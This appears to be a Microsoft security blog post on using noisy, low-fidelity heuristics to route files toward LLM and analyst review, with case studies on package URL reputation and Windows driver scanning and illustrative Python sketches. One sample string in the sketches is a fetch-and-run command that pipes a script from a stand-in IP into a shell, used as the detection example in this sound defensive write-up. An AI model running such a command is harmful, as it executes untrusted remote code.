Zero-day exploitation is accelerating, and security teams increasingly need AI to reason about intent—not just indicators. But running high-cost AI analysis on every file is rarely feasible at scale. A practical alternative is to use inexpensive, low-fidelity (LoFi) signals as a routing layer: let noisy heuristics cast a wide net, then selectively escalate only the most suspicious hits into resource-intensive AI or analyst workflows. This article shows how that model can turn “too noisy to use” signals into high-confidence, actionable detections.
Introduction
Low-fidelity signals—heuristics that are cheap to compute but often ambiguous—have traditionally been viewed as a necessary annoyance in security operations. In high-volume pipelines, even a modest false-positive rate can translate into operational disruption: unnecessary blocks, costly recoveries, customer frustration, and analyst burnout from constant triage.
In the supply-chain scanning service operated by the Trust and Security Services group at Microsoft, LoFi signals include URL and certificate reputation, obfuscation and packer detection, multiple YARA rule families, high-impact API usage (for example, TerminateProcess), and vulnerability detections. Any one of these may be noisy, or may fire accurately on behavior that turns out to be perfectly legitimate. The key shift in the AI era is to stop treating LoFi hits as verdicts and start using them as decision points: triggers for deeper, contextual analysis.
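To make the "decision point" idea concrete, here is a minimal sketch of a LoFi hit choosing the next stage rather than issuing a verdict. The signal names, the `ScanResult` type, and the stage labels are all hypothetical, chosen for illustration; they do not describe the production service.

```python
from dataclasses import dataclass

# Hypothetical signal names, loosely mirroring the categories listed above.
ESCALATION_SIGNALS = frozenset(
    {"url_reputation", "obfuscation", "yara", "high_impact_api"}
)

@dataclass
class ScanResult:
    file_id: str
    lofi_hits: frozenset = frozenset()  # names of the cheap heuristics that fired

def route(result: ScanResult) -> str:
    """Pick the next stage for a file; a LoFi hit never blocks by itself."""
    if result.lofi_hits & ESCALATION_SIGNALS:
        return "deep_analysis"  # expensive AI or analyst workflow
    return "standard_path"      # no cheap signal fired; skip the costly stage

print(route(ScanResult("pkg-a", frozenset({"url_reputation"}))))  # deep_analysis
print(route(ScanResult("pkg-b")))                                 # standard_path
```

The point of the sketch is that `route` only ever returns a destination: blocking decisions are left to whatever runs in the deeper stage.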
Two case studies: LoFi signals as routing, not verdicts
Case study 1: URL reputation + LLMs—turning noisy signals into zero-day detections
Our supply-chain scanning pipeline processes billions of files each day across public package registries. About 150 million files are routed through a URL reputation stage that extracts embedded URLs and evaluates them using threat intelligence plus heuristic rules. At this scale, small error rates become unmanageable: “a little noisy” turns into tens of thousands of daily alerts.
Before: Signal overload
Heuristic-only URL reputation produced roughly 40,000 blocking detections per day. Although many were genuine threats, the volume made it difficult to distinguish confirmed malware from false positives with confidence. Multiple heuristic layers provided partial signals, but none reliably produced a high-confidence verdict. As a result, analysts spent substantial time triaging files and tuning detection logic, weighing the risk that stricter blocking would disrupt legitimate packages against the risk that looser blocking would miss true malware.
After: LLM-assisted signal refinement
Adding LLM-based contextual analysis on top of URL reputation changed the signal-to-noise ratio. Instead of judging a URL in isolation, the model evaluates how it is used in surrounding code—an install script versus a documentation link, an obfuscated payload download versus a legitimate API call.
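One way to give a model that surrounding context is to pass each URL together with the lines around it. The sketch below assumes a simple regular expression for URL extraction and a two-line window. The prompt wording and the helper names `url_contexts` and `build_prompt` are illustrative, not the pipeline's actual implementation, and the call to a model is deliberately left out.

```python
import re

# Simplified URL matcher (an assumption); real extraction is likely more thorough.
URL_PATTERN = re.compile(r"https?://[^\s'\"<>)]+")

def url_contexts(source: str, radius: int = 2) -> list[dict]:
    """Return each embedded URL with the lines that surround it."""
    lines = source.splitlines()
    contexts = []
    for i, line in enumerate(lines):
        for match in URL_PATTERN.finditer(line):
            start = max(0, i - radius)
            end = min(len(lines), i + radius + 1)
            contexts.append({
                "url": match.group(0),
                "line": i + 1,  # 1-based line number
                "snippet": "\n".join(lines[start:end]),
            })
    return contexts

def build_prompt(filename: str, ctx: dict) -> str:
    """Assemble a hypothetical prompt; the wording is illustrative only."""
    return (
        f"File: {filename}\n"
        f"URL: {ctx['url']} (line {ctx['line']})\n"
        f"Surrounding code:\n{ctx['snippet']}\n"
        "Question: is this URL used to fetch or execute a payload, "
        "or is it documentation or a routine API call?"
    )

sample = (
    "# Docs: https://example.com/docs\n"
    "import os\n"
    "os.system('curl http://198.51.100.7/x.sh | sh')\n"
)
for ctx in url_contexts(sample):
    print(build_prompt("setup.py", ctx))
    print("---")
```

In the sample, both URLs would trip a reputation heuristic in the same way, but the snippet shows one sitting in a comment and the other being piped into a shell, which is the distinction the model is asked to make.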
Outcome: ~2,000× reduction in alerts—down to about 20 high-confidence blocking detections per day—saving substantial analyst time. More importantly, the remaining alerts skew toward true zero-days that other engines in the pipeline were missing.
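The arithmetic behind that figure is quick to check. The sketch below uses the rounded numbers quoted in this case study and assumes that all blocking detections originate from the roughly 150 million files routed through the URL reputation stage, so the rates are approximations.

```python
files_in_url_stage = 150_000_000  # files routed through URL reputation
alerts_before = 40_000            # heuristic-only blocking detections per day
alerts_after = 20                 # detections per day after LLM refinement

reduction = alerts_before / alerts_after
rate_before = alerts_before / files_in_url_stage
rate_after = alerts_after / files_in_url_stage

print(f"reduction: {reduction:,.0f}x")              # reduction: 2,000x
print(f"flagged before: {rate_before:.4%} of files")  # 0.0267%
print(f"flagged after:  {rate_after:.6%} of files")   # 0.000013%
```

Even a hit rate below three hundredths of a percent produces tens of thousands of alerts at this volume, which is why the heuristic alone could not serve as a verdict.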
Case study 2: Windows Device Driver scanning pipelines—scaling LoFi signals into actionable detections
Beyond supply-chain package scanning, LoFi-driven routing patterns also show up in third-party device driver scanning used for the Windows certification program and post-publishing rescan workflows. The pipeline operates at high volume under strict performance and reliability constraints, making “scan everything deeply” unrealistic.
The device driver pipeline receives about 70,000 submissions per month (based on January 2026 figures). From these submissions, roughly 1 million individual files are extracted and scanned. At this scale, even moderately noisy heuristics become unmanageable if treated as high-confidence detections.
Before: high-volume, low-confidence heuristics
Several LoFi heuristic detectors (primarily YARA rule-based) run in audit (telemetry-only) mode in the driver pipeline, including:
- Presence of network routing/manipulation (for example, network filter drivers): ~19,000 files/month
- Use of a process-termination API by a driver: ~5,000 files/month
- Obfuscated or packed driver: ~500 files/month
These detectors are fast and inexpensive, but inherently imprecise. Many flagged files reflect legitimate driver behavior (packing, process termination, filtering logic), so turning every hit into enforcement would create an unacceptable volume of false positives. Without refinement, LoFi hits function best as indicators of potential risk—not actionable verdicts.
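To put the detector volumes in proportion, the sketch below divides each monthly count by the roughly 1 million files scanned. The summed figure is an upper bound, because the same file may trip more than one detector; the overlap is not stated here, so that is an assumption.

```python
files_scanned = 1_000_000  # approximate files per month extracted from submissions

hits_per_month = {
    "network routing/manipulation": 19_000,
    "process-termination API": 5_000,
    "obfuscated or packed": 500,
}

for name, hits in hits_per_month.items():
    print(f"{name}: {hits / files_scanned:.2%} of scanned files")

# Upper bound only: a single file can appear under several detectors.
total = sum(hits_per_month.values())
print(f"at most {total:,} flagged files ({total / files_scanned:.2%})")
```

At most about 2.45% of scanned files are flagged at all, yet that is still up to 24,500 files a month, far more than analysts could review one by one.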
After: selective escalation and targeted analysis
Instead of treating every LoFi hit equally, the pipeline escalates only the top 4% of results for deeper inspection. Those samples get additional correlation and malware analyst review, which enables the creation of concrete, high-confidence signatures that can be safely enforced at scale.
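The selection step can be sketched as a top-fraction cut over scored hits. How hits are ranked is not specified here, so the numeric suspicion score, the `top_fraction` helper, and the sample data below are hypothetical.

```python
import heapq
import math

def top_fraction(scored_hits: dict[str, float], fraction: float = 0.04) -> list[str]:
    """Return the IDs of the highest-scoring hits, keeping at least one."""
    if not scored_hits:
        return []
    k = max(1, math.ceil(len(scored_hits) * fraction))
    # nlargest avoids sorting the full set when only a few items are needed.
    return heapq.nlargest(k, scored_hits, key=scored_hits.get)

# Hypothetical scores for 50 flagged files; file-49 scores highest.
hits = {f"file-{i:02d}": i / 50 for i in range(50)}
print(top_fraction(hits))  # ['file-49', 'file-48']
```

Keeping the cut as a fraction rather than a fixed count lets the escalation volume scale with the number of hits while staying a predictable share of analyst workload.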
With this targeted escalation model:
- An average of ~5 new blocking detections are added per month
- Each detection typically identifies 10–100 malicious files
- Confirmed malware is blocked without broadly impacting legitimate driver submissions
This approach preserves throughput while focusing scarce expert time on the most suspicious artifacts. In other words, LoFi signals stop being “detections” and become efficient filters that route the right samples into high-cost analysis—where you can then generate durable, high-confidence blocking rules.
Key takeaways
- LoFi is a routing layer. In AI-era pipelines, the goal is not to make every cheap heuristic perfectly precise; it is to use each one to decide where to spend expensive compute and analyst time.
- Context beats indicators. LLMs can turn ambiguous URL signals into high-confidence decisions by reasoning about usage and intent, not just matching patterns.
- Escalate a small fraction, learn continuously. Selecting the top few percent for deeper analysis keeps throughput high and creates a feedback loop that produces enforceable signatures.
- Measure success by outcomes. The win is reduced alert volume and improved catch quality (for example, zero-days and durable blocking rules) rather than “more detections.”
Conclusion
As threat actors move faster and zero-days become more common, security systems have to make better decisions under tighter latency and cost constraints. The answer is not to replace LoFi signals with AI everywhere; it is to combine them. Cheap heuristics can cover the full surface area, while AI (and human expertise) is reserved for the small subset of events that truly deserve deeper reasoning.
Both case studies illustrate the same pattern. In supply-chain scanning, LLMs transformed a 40,000-per-day alert stream into ~20 high-confidence blocks—surfacing zero-days that were previously lost in the noise. In device driver scanning, selective escalation of the top LoFi hits converts “interesting but unenforceable” heuristics into a steady stream of high-confidence blocking signatures. In practice, the most scalable security posture is a tiered one: LoFi for breadth, AI for context, and analysts for the hardest calls.